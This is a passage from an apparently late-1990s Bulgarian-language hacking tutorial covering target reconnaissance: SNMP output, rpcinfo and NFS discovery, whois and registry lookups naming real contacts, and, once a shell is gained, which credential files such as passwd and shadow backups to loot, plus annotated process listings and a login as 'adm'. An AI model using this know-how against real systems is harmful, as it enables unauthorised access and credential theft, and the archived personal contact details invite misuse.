host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16892 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16906 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.17039 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.18234 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.19270 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.19271 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20317 = INTEGER: 16
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20318 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20319 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20321 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.20933 = INTEGER: 6
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23404 = INTEGER: 7
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23405 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23407 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.23408 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.25643 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.26507 = INTEGER: 1707
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.29233 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.30685 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.0 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1 = INTEGER: 124
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.3 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.4 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13 = INTEGER: 28
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.185 = INTEGER: 212
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.187 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.194 = INTEGER: 52
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.198 = INTEGER: 320
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.200 = INTEGER: 72
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.203 = INTEGER: 1468
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.209 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.216 = INTEGER: 340
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.220 = INTEGER: 1900
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.231 = INTEGER: 164
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.236 = INTEGER: 72
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.331 = INTEGER: 1188
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1801 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1802 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1803 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1804 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1805 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1806 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1807 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1808 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1809 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1810 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1811 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1812 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1813 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1814 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1815 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1816 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1817 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1818 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.1819 = INTEGER: 23120
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2726 = INTEGER: 768
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2727 = INTEGER: 836
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.2728 = INTEGER: 844
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.11969 = INTEGER: 920
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13050 = INTEGER: 916
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13051 = INTEGER: 916
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13052 = INTEGER: 920
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13506 = INTEGER: 844
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13521 = INTEGER: 588
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13872 = INTEGER: 508
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13873 = INTEGER: 504
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13874 = INTEGER: 496
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13875 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13876 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13877 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.13878 = INTEGER: 396
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16256 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16748 = INTEGER: 1072
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16750 = INTEGER: 1200
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16892 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.16906 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.17039 = INTEGER: 568
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.18234 = INTEGER: 776
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.19270 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.19271 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20317 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20318 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20319 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20321 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.20933 = INTEGER: 104
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23404 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23405 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23407 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.23408 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.25643 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.26507 = INTEGER: 344
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.29233 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfMem.30685 = INTEGER: 560
<[ razlichni danni za hosta....... ]>
1.8. rpcinfo - razlichni RPC uslugi,NFS.
Eto primeren izhod ot rpcinfo -p <host>
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 udp 2049 nfs
100003 2 tcp 2049 nfs
100005 1 udp 944 mountd
100005 2 udp 944 mountd
100005 1 tcp 947 mountd
100005 2 tcp 947 mountd
<[ Tazi mashina si ima nfs i mountd pusnati,t.e. ot neq mogat da se polzvat
razlichni direktorii, v zavisimost ot export-a ]>
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 2173 nlockmgr
100021 3 udp 2173 nlockmgr
100021 1 tcp 3046 nlockmgr
100021 3 tcp 3046 nlockmgr
<[ tova puk e druga mashina, koqto nqma samoto nfsd, a samo lockd - lock
manager za NSF. ]>
a tva e izhoda na rpcinfo, kogato nqma RPC na otsreshtnata mashina.
rpcinfo: can't contact portmapper: RPC: Remote system error - Connection refused
1.10. informaciq ot drugi organizacii - internic, RIPE
Primeren izhod ot whois spnet.net
Access to Network Solutions' WHOIS information is provided to assist persons
in determining the contents of a domain name registration record in NSI's
registrar database. The data in this record is provided by NSI for
informational purposes only, and NSI does not guarantee its accuracy.
Compilation, repackaging, dissemination, or other use of the WHOIS database
in its entirety, or a substantial portion thereof, is not allowed without
NSI's prior written permission. By submitting this query, you agree to abide
by this policy. All rights reserved.
Registrant:
Spectrum Net Ltd. (SPNET3-DOM)
1, Universiada Blvd.
Sofia,
BG
Domain Name: SPNET.NET
Administrative Contact:
Zahov Theodore (ZT13-ORG) zahov@BIOTEAM.COM
+359 2 757125
Fax- +359 2 9753026
Technical Contact, Zone Contact:
Shtinkov, Peter (PS5645) shtinkov@SPNET.NET
(+359 2) 757 125 (FAX) (+359 2) 975 3026
Billing Contact:
Zahov Theodore (ZT13-ORG) zahov@BIOTEAM.COM
+359 2 757125
Fax- +359 2 9753026
Record last updated on 26-Apr-98.
Record created on 17-Nov-97.
Database last updated on 15-Jul-99 09:10:38 EDT.
Domain servers in listed order:
NS.SPNET.NET 212.50.0.10
PURGATORY.SPNET.NET 212.50.0.15
BIOLIN.BIOTEAM.COM 212.50.0.9
A tova e primeren izhod ot whois za nameserver (propusnat e disclaimer-a na
internic) :
[No name] (NS39745-HST)
Hostname: NS.SPNET.NET
Address: 212.50.0.10
System: ? running ?
Coordinator:
Shtinkov, Peter (PS5645) shtinkov@SPNET.NET
(+359 2) 757 125 (FAX) (+359 2) 975 3026
Record last updated on 03-Apr-98.
Database last updated on 15-Jul-99 09:10:38 EDT.
I, razbira se, info-to koeto se pokzazva za tehnichesko ili adminstrativno
kontaktno lice:
Shtinkov, Peter (PS5645) shtinkov@SPNET.NET
Spectrum NET
1 Liapchev blvd.
Sofia
1797
BG
(+359 2) 757 125 (FAX) (+359 2) 975 3026
Record last updated on 03-Mar-98.
Database last updated on 15-Jul-99 09:10:38 EDT.
Osveni internic mozhe da se pita naprimer i bulgarskata baza, za koqto
mozhem da pitame whois.ripe.net:
% Rights restricted by copyright. See http://www.ripe.net/db/dbcopyright.html
domain: nat.bg
descr: Naturella AD
admin-c: MM395-RIPE
tech-c: DD183-RIPE
zone-c: ZB41-RIPE
notify: hostmaster@digsys.bg
mnt-by: BG-DOMREG
changed: hostmaster@digsys.bg 19970317
source: RIPE
person: Michael Michailov
address: Mladost I, bl. 9
address: 1784 Sofia
address: Bulgaria
phone: +359 2 974 32 53
fax-no: +359 2 974 30 95
e-mail: mike@naturella.com
nic-hdl: MM395-RIPE
notify: registry@naturella.com
changed: hostmaster@ripe.net 19961022
source: RIPE
person: Delian Delchev
address: Mladost I, bl. 9
address: 1784 Sofia
address: Bulgaria
phone: +359 2 974 32 53
fax-no: +359 2 974 30 95
e-mail: delian@naturella.com
nic-hdl: DD183-RIPE
notify: registry@naturella.com
changed: hostmaster@ripe.net 19961022
source: RIPE
person: Zvezdelin Borisov
address: Naturella AD
address: Mladost 1 bl.9
address: BG-1000 Sofia
address: Bulgaria
phone: +359 2 768891
fax-no: +359 2 9743095
e-mail: zen@wfpa.acad.bg
nic-hdl: ZB41-RIPE
changed: hostmaster@digsys.bg 19970317
source: RIPE
Tuk naprimer formata e po-razlichen - napravo pokazva licata za kontakti, no
ne dava name serverite, koito obache lesno mogat da se izvadqt s nslookup:
Non-authoritative answer:
nat.bg nameserver = equila.nat.bg
nat.bg nameserver = aquila.nat.bg
nat.bg nameserver = home.nat.bg
Authoritative answers can be found from:
equila.nat.bg internet address = 194.12.224.33
aquila.nat.bg internet address = 194.12.224.18
home.nat.bg internet address = 194.12.224.34
A, razbira se, mozhem da pitame i localnata baza v .bg (digsys.bg)
Domain information
Domain name: nat.bg
Organization: Agency Naturella Ltd
Address: Mladost I, bl. 9, 1784 Sofia
Admin contact: MM395-RIPE
Tech contact: DD183-RIPE ZB41-RIPE
Name servers: ns1.naturella.bg ns2.naturella.bg ns3.naturella.bg auth02.ns.uu.net
Registration status: Registered
Requested on: 01-02-1997
Registered on: 21-04-1997
Contact information
Administrative contact
Name: Michael Michailov
Organization: Naturella AD
Address: Mladost I, bl. 9, 1784 Sofia
E-mail: mike@wfpa.acad.bg
Phone number(s): +359 2 974 32 53
Fax number(s): +359 2 974 30 95
NIC handle: MM395-RIPE
Technical contact(s)
Name: Delian Delchev
Organization: Naturella AD
Address: Mladost I, bl. 9, 1784 Sofia
E-mail: delian@naturella.com
Phone number(s): +359 2 974 32 53
Fax number(s): +359 2 974 30 95
NIC handle: DD183-RIPE
Name: Zvezdelin Borisov
Organization: Naturella AD
Address: Mladost I, bl. 9, 1784 Sofia
E-mail: zen@wfpa.acad.bg
Phone number(s): +359 2 768891
Fax number(s): +359 2 9743095
NIC handle: ZB41-RIPE
Name server information
Nameserver: ns1.naturella.bg (194.12.224.33)
Nameserver: ns2.naturella.bg (194.12.224.34)
Nameserver: ns3.naturella.bg (194.12.224.18)
Nameserver: auth02.ns.uu.net
I kakto se okazva, nashata baza dava poveche informaciq .. :))))
Eto oshte edin primer - BNB...
Domain information
Domain name: bnb.bg
Organization: Bulgarian National Bank
Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
Admin contact: VS663-RIPE
Tech contact: GD713-RIPE SK1461-RIPE
Name servers: ns.bnb.bg mbox.enpro.bg ns.uk.ibm.net
Registration status: Registered
Requested on: 24-07-1998
Registered on: 20-08-1998
Contact information
Administrative contact
Name: Velizar Stoilov
Organization: Bulgarian National bank
Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
E-mail:
Phone number(s): +359 2 9807371
Fax number(s): +359 2 9802425
NIC handle: VS663-RIPE
Technical contact(s)
Name: George Petkov Dimitrov
Organization: Bulgarian National Bank
Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
E-mail: bnbin004@ibm.net
Phone number(s): +359 2 8861630 +359 2 8861632
Fax number(s): +359 2 9802425
NIC handle: GD713-RIPE
Name: Stefan Georgiev Krastanov
Organization: Bulgarian National Bank
Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
E-mail: bnbin003@ibm.net
Phone number(s): +359 2 8861266 +359 2 8866266
Fax number(s): +359 2 9802425
NIC handle: SK1461-RIPE
Name server information
Nameserver: ns.bnb.bg (62.200.195.14)
Nameserver: mbox.enpro.bg (195.24.40.65)
Nameserver: ns.uk.ibm.net
Tova po princip e edna ot purvite stupki predi vadene na DNS baza...
1.11 Ako imame shell ?
Ako imame shell na nqkoq mashina, mestata, ot koito mozhem da izkopchim
cenna informaciq, sa slednite: /var/log, /etc, /root, /home, kakto i vsqka
druga stranna direktoriq v / . Naj-interesni sa mozhe bi fajlovete v /etc
kato passwd, shadow- ili shadow~ (backup fajlove), hosts, networks
(posledniqt se polzva rqdko), services (za stranni portove za neshta, koito
po princip gi nqma v services-a), crotab-ovete (koe koga se puska, naprimer
botchk-ove ili bnchck-ove), fstab (koj diskov partition kude se polzva),
kakto i vsqkakvi fajlove, koito sa nepoznati i mogat da dadat nqkakva
polezna informaciq za sistemata. Direktoriq /proc (v linux osnovno) mozhe da
dade informaciq za fizicheskite harakteristiki na mashinata (naprimer dali
si struva da se puska passwd cracker na neq :))) ), kakto i kak sa i
podredeni diskovete i t.n. Primer:
/proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 6
model name : Celeron (Mendocino)
stepping : 0
cpu MHz : 300.688171
cache size : 128 KB
fdiv_bug : no
hlt_bug : no
sep_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx osfxsr
bogomips : 299.83
/proc/nvram
Checksum status: valid
# floppies : 1
Floppy 0 type : 3.5'' 1.44M
Floppy 1 type : none
HD 0 type : none
HD 1 type : none
HD type 48 data: 0/0/0 C/H/S, precomp 65280, lz 0
HD type 49 data: 65535/255/113 C/H/S, precomp 65535, lz 3071
DOS base memory: 640 kB
Extended memory: 64448 kB (configured), 64448 kB (tested)
Gfx adapter : EGA, VGA, ... (with BIOS)
FPU : installed
Komandata dmesg sushto mozhe da e adski polezna, zashtoto ivzezhda vsichki
subshteniq na kernel-a ot zarezhdaneto do sega - mogat da se namerqt nqkoi
interesni neshta v izhoda na taq komanda...
Sushto taka veselo e da se vidqt running procesite na nqkoq mashina (koeto
mozhe i da stane, ako choveka si ima otvoresn systat port, t.e. instaliral e
nqkoj mizhav slackware i ne go e opravql)... eto edin primeren izhod ot ps
auxww:
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
bin 181 0.0 0.0 788 0 ? SW Jul 23 0:00 (portmap)
<{ Yaaaaaa portmaper ... :))) mozhe i nfs da ima ]>
cache 216 0.0 35.5 40420 22452 ? S Jul 23 1:00 (squid) -sYD
cache 219 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 220 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 221 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 222 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 223 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 224 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 226 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 227 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 228 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 229 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 230 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 234 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 235 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 236 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 237 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 238 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 240 0.0 35.5 40420 22452 ? S Jul 23 0:00 (squid) -sYD
cache 11998 0.0 0.8 980 508 ? S 16:06 0:00 (dnsserver)
cache 11999 0.0 0.7 980 500 ? S 16:06 0:00 (dnsserver)
cache 12000 0.0 0.7 980 496 ? S 16:06 0:00 (dnsserver)
cache 12001 0.0 0.6 912 396 ? S 16:06 0:00 (dnsserver)
cache 12002 0.0 0.6 912 396 ? S 16:06 0:00 (dnsserver)
cache 12003 0.0 0.6 912 396 ? S 16:06 0:00 (dnsserver)
cache 12004 0.0 0.6 912 396 ? S 16:06 0:00 (dnsserver)
<[ Tipichen squid proxy server, kompiliran s async IO (pthreads), sus
izpolzvane na 40MB ot pametta... uaa kva lamq....]>
opers 16304 0.0 1.8 1836 1156 3 S 18:46 0:00 -bash
<[ Nqkoj lognat sus shell account kakto izglezda... ]>
httpd 6816 0.0 1.5 1896 1004 ? S 13:15 0:00 /usr/sbin/apache
httpd 13165 0.0 1.7 1896 1120 ? S 16:48 0:00 /usr/sbin/apache
httpd 13166 0.0 1.7 1896 1116 ? S 16:48 0:00 /usr/sbin/apache
httpd 13167 0.0 1.7 1896 1116 ? S 16:48 0:00 /usr/sbin/apache
httpd 17078 0.0 1.7 1896 1088 ? S 19:28 0:00 /usr/sbin/apache
httpd 26622 0.0 1.6 1896 1032 ? S 02:49 0:00 /usr/sbin/apache
httpd 30896 0.0 1.5 1896 988 ? S Jul 24 0:00 /usr/sbin/apache
<[ Lubimiqt na vsichki ni apache webserver .... ]>
bota 370 0.0 1.9 2336 1248 ? S Jul 23 0:14 eggdrop ./botche
<[ I oshte po-lubimiqt ni eggdrop ]>
user1 15852 0.0 1.3 1644 844 ? S 18:15 0:00 bash /sbin/lppplogin
<[ Kakto izglezhda tazi mashina e i dialup server, ako se sudi po imeto na
scripta ... ]>
root 1 0.0 0.4 764 300 ? S Jul 23 0:04 init [2]
root 2 0.0 0.0 0 0 ? SW Jul 23 0:00 (kflushd)
root 3 0.0 0.0 0 0 ? SW Jul 23 0:00 (kpiod)
root 4 0.0 0.0 0 0 ? SW Jul 23 0:01 (kswapd)
root 13 0.0 0.0 720 28 ? S Jul 23 0:01 update
root 168 0.0 0.3 912 220 ? S Jul 23 0:14 /sbin/syslogd
root 170 0.0 0.2 804 160 ? S Jul 23 0:00 /sbin/klogd
root 177 0.0 0.0 740 52 ? S Jul 23 0:00 /sbin/kerneld
root 183 0.0 0.1 860 72 ? S Jul 23 0:03 /usr/sbin/inetd
root 186 0.0 1.9 2072 1220 ? S Jul 23 0:09 /usr/sbin/named
root 192 0.0 0.0 908 0 ? SW Jul 23 0:00 (lpd)
root 199 0.0 0.5 1736 340 ? S Jul 23 0:02 sendmail: accepting connections on port 25
root 203 0.0 2.5 3664 1604 ? S Jul 23 3:25 /usr/sbin/snmpd -f
<[ SNMP daemon :))) interesno ... ]>
root 206 0.0 0.5 1292 344 ? S Jul 23 0:20 /usr/sbin/sshd
root 214 0.0 0.0 2832 0 ? SW Jul 23 0:00 (squid)
root 231 0.0 0.2 852 164 ? S Jul 23 0:00 /usr/sbin/cron
root 249 0.0 0.1 1836 72 ? S Jul 23 0:00 /usr/sbin/apache
root 265 0.0 0.0 836 0 7 SW Jul 23 0:00 (getty)
root 266 0.0 0.0 836 0 8 SW Jul 23 0:00 (getty)
root 267 0.0 0.0 836 0 9 SW Jul 23 0:00 (getty)
root 268 0.0 0.0 836 0 10 SW Jul 23 0:00 (getty)
root 1100 0.0 0.0 836 24 4 S Jul 23 0:00 /sbin/getty 38400 tty4
root 1101 0.0 0.0 836 0 5 SW Jul 23 0:00 (getty)
root 1102 0.0 0.0 836 0 6 SW Jul 23 0:00 (getty)
root 10626 0.0 1.1 1844 752 2 S 15:23 0:00 -bash
root 11971 0.0 0.9 1124 596 D1 S 16:06 0:00 /usr/sbin/pppd ttyD1 38400 defaultroute noipdefault -detach 99.23.125.193: lock
<[ Vruzka na providera navun.... ]>
root 12007 0.0 1.3 1716 864 2 S 16:07 0:07 tcpdump -ni ppp1
<[ OOOPS... tcpdump... kogo li slushat v momenta ? :) ]>
root 15883 0.0 0.9 1124 584 ? S 18:17 0:00 /usr/sbin/pppd -detach modem crtscts 99.23.125.193:99.23.125.202 /dev/cud4 ipparam user1
<[ PPP vruzka ..pppd na koeto kato parameter se dobavq imeto na user-a..
interesno,ne mozhe li da polzva login opciqta na pppd ? mozhe bi si ima
nqkakva prichina za tova ..... ]>
root 18310 0.0 1.6 1568 1064 ? S 20:32 0:00 /usr/sbin/sshd
root 18312 0.0 1.8 1828 1180 p1 S 20:32 0:00 -bash
root 18317 0.0 0.5 752 324 p1 S 20:33 0:00 tail -f /usr/local/squid/logs/access.log
<[ Tipichno paranoichen sysadmin - postoqnno gleda log-a na proxy-to ]>
root 20240 0.0 0.9 1124 584 ? S 22:17 0:00 /usr/sbin/pppd -detach modem crtscts 99.23.125.193:99.23.125.204 /dev/cud6 ipparam ppp
root 20429 0.0 0.8 1176 568 ? S 22:24 0:00 /sbin/uugettyps cud5 38400
root 20876 0.0 0.8 1176 568 ? S 22:35 0:00 /sbin/uugettyps cud3 38400
root 21388 0.0 0.8 1176 568 D2 S 22:53 0:00 /sbin/uugettyps ttyD2 38400
root 21509 0.0 0.8 1176 568 ? S 22:58 0:00 /sbin/uugettyps cud7 38400
root 21595 0.0 1.6 1564 1072 ? S 23:02 0:00 /usr/sbin/sshd
root 21597 0.0 1.8 1828 1164 p0 S 23:02 0:00 -bash
root 21766 0.0 1.5 1860 984 ? S 23:12 0:00 sendmail: server mail.yahoo.com [214.122.34.1] cmd read
root 21902 0.1 2.0 2032 1264 ? S 23:20 0:00 sendmail: XAA2185 mail.hotmail.com : client greeting
root 21903 0.0 0.3 852 248 ? S 23:20 0:00 /USR/SBIN/CRON
root 21920 1.0 0.6 864 428 ? R 23:20 0:00 /usr/bin/fping -i1000 -r5 192.168.1.11 192.168.1.12 192.168.1.2 192.168.1.8 192.168.1.77 192.168.1.88
<[ chast ot autostatus-a, po-dolu ]>
ppp 17917 0.0 1.3 1644 844 ? S 20:05 0:00 bash /sbin/lppplogin
admin 21907 0.1 1.2 1624 796 ? S 23:20 0:00 /bin/sh -c /usr/local/bin/autostatus /usr/local/etc/conf 1>/dev/null 2>/dev/null
admin 21909 0.5 1.7 1856 1136 ? S 23:20 0:00 perl /usr/local/bin/autostatus /usr/local/etc/conf
<[ Autostatus-a e monitorin tool tova koi mashini sa vklucheni v momenta
...interesno ... za kvo li tolkoz e pritrqbval ? ]>
Eto tozi izhod mozhe da pokazhe mnooooogo za sistemata, a i tulkuvaneto mu
ne e slozhna zadacha, kakto se vizhda ot komentarite.......
Drug interesen primer ot edna sistema:
Connected to dobrich.org.
Escape character is '^]'.
Welcome to Linux 2.0.35.
webserv login: adm
Password:
Linux 2.0.35.
Last login: Tue Jul 27 00:23:14 on ttyp0 from pool0.priovider.net.
You have mail.
bash: fortune: command not found
<[ mdaaaaaa nqkoj tuka e obrukal malko.......]>
